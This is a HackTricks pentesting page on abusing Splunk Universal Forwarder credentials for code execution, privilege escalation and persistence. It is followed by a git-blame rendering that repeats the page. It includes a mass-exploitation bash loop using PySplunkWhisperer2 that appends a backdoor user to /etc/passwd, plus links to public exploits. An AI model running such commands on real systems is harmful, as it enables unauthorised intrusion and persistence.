hacktricks/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md

# Splunk LPE and Persistence

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

If **enumerating** a machine **internally** or **externally** you find **Splunk running** (port 8090), if you luckily know any **valid credentials** you can **abuse the Splunk service** to **execute a shell** as the user running Splunk. If root is running it, you can escalate privileges to root.

Also if you are **already root and the Splunk service is not listening only on localhost**, you can **steal** the **password** file **from** the Splunk service and **crack** the passwords, or **add new** credentials to it. And maintain persistence on the host.

In the first image below you can see how a Splunkd web page looks like.


## Splunk Universal Forwarder Agent Exploit Summary

For further details check the post [https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/). This is just a sumary:

**Exploit Overview:**
An exploit targeting the Splunk Universal Forwarder Agent (UF) allows attackers with the agent password to execute arbitrary code on systems running the agent, potentially compromising an entire network.

**Key Points:**
- The UF agent does not validate incoming connections or the authenticity of code, making it vulnerable to unauthorized code execution.
- Common password acquisition methods include locating them in network directories, file shares, or internal documentation.
- Successful exploitation can lead to SYSTEM or root level access on compromised hosts, data exfiltration, and further network infiltration.

**Exploit Execution:**
1. Attacker obtains the UF agent password.
2. Utilizes the Splunk API to send commands or scripts to the agents.
3. Possible actions include file extraction, user account manipulation, and system compromise.

**Impact:**
- Full network compromise with SYSTEM/root level permissions on each host.
- Potential for disabling logging to evade detection.
- Installation of backdoors or ransomware.

**Example Command for Exploitation:**
```bash
for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done
```

**Usable public exploits:**
* https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
* https://www.exploit-db.com/exploits/46238
* https://www.exploit-db.com/exploits/46487


## Abusing Splunk Queries

**For further details check the post [https://blog.hrncirik.net/cve-2023-46214-analysis](https://blog.hrncirik.net/cve-2023-46214-analysis)**

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
GITBOOK-4174: change request with no subject merged in GitBook 2023-12-04 09:33:43 +00:00			`# Splunk LPE and Persistence`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
a 2024-07-29 08:38:48 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
a 2024-07-29 08:38:48 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
a 2024-07-29 08:38:48 +00:00			`<summary>Support HackTricks</summary>`
arte 2023-12-30 20:49:49 +00:00
a 2024-07-29 08:38:48 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
a 2024-07-18 23:15:55 +00:00			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GitBook: [#2876] save 2021-11-30 16:46:07 +00:00			`If enumerating a machine internally or externally you find Splunk running (port 8090), if you luckily know any valid credentials you can abuse the Splunk service to execute a shell as the user running Splunk. If root is running it, you can escalate privileges to root.`
GitBook: [master] 2 pages modified 2020-11-06 00:30:40 +00:00
GitBook: [#2876] save 2021-11-30 16:46:07 +00:00			`Also if you are already root and the Splunk service is not listening only on localhost, you can steal the password file from the Splunk service and crack the passwords, or add new credentials to it. And maintain persistence on the host.`
GitBook: [master] 2 pages modified 2020-11-06 00:30:40 +00:00
GITBOOK-4174: change request with no subject merged in GitBook 2023-12-04 09:33:43 +00:00			`In the first image below you can see how a Splunkd web page looks like.`
GitBook: [master] 2 pages modified 2020-11-06 00:30:40 +00:00


a 2024-02-07 04:06:18 +00:00			`## Splunk Universal Forwarder Agent Exploit Summary`
GitBook: [master] 2 pages modified 2020-11-06 00:30:40 +00:00
a 2024-02-08 21:36:35 +00:00			`For further details check the post [https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/). This is just a sumary:`
GitBook: [master] 2 pages modified 2020-11-06 00:30:40 +00:00
a 2024-02-07 04:06:18 +00:00			`Exploit Overview:`
			`An exploit targeting the Splunk Universal Forwarder Agent (UF) allows attackers with the agent password to execute arbitrary code on systems running the agent, potentially compromising an entire network.`
GitBook: [master] 2 pages modified 2020-11-06 00:30:40 +00:00
a 2024-02-07 04:06:18 +00:00			`Key Points:`
			`- The UF agent does not validate incoming connections or the authenticity of code, making it vulnerable to unauthorized code execution.`
			`- Common password acquisition methods include locating them in network directories, file shares, or internal documentation.`
			`- Successful exploitation can lead to SYSTEM or root level access on compromised hosts, data exfiltration, and further network infiltration.`
GitBook: [master] 2 pages modified 2020-11-06 00:30:40 +00:00
a 2024-02-07 04:06:18 +00:00			`Exploit Execution:`
			`1. Attacker obtains the UF agent password.`
			`2. Utilizes the Splunk API to send commands or scripts to the agents.`
			`3. Possible actions include file extraction, user account manipulation, and system compromise.`
GitBook: [master] 2 pages modified 2020-11-06 00:30:40 +00:00
a 2024-02-07 04:06:18 +00:00			`Impact:`
			`- Full network compromise with SYSTEM/root level permissions on each host.`
			`- Potential for disabling logging to evade detection.`
			`- Installation of backdoors or ransomware.`
GitBook: [master] 2 pages modified 2020-11-06 00:30:40 +00:00
a 2024-02-07 04:06:18 +00:00			`Example Command for Exploitation:`
GitBook: [master] 2 pages modified 2020-11-06 00:30:40 +00:00			```bash
			for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done
			```

a 2024-02-07 04:06:18 +00:00			`Usable public exploits:`
GitBook: [master] 2 pages modified 2020-11-06 00:30:40 +00:00			`* https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2`
			`* https://www.exploit-db.com/exploits/46238`
			`* https://www.exploit-db.com/exploits/46487`

Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GITBOOK-4174: change request with no subject merged in GitBook 2023-12-04 09:33:43 +00:00			`## Abusing Splunk Queries`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
a 2024-02-07 04:06:18 +00:00			`For further details check the post [https://blog.hrncirik.net/cve-2023-46214-analysis](https://blog.hrncirik.net/cve-2023-46214-analysis)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
a 2024-07-29 08:38:48 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
a 2024-07-29 08:38:48 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
a 2024-07-29 08:38:48 +00:00			`<summary>Support HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
a 2024-07-29 08:38:48 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
a 2024-07-18 23:15:55 +00:00			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
a 2024-07-18 23:15:55 +00:00			`{% endhint %}`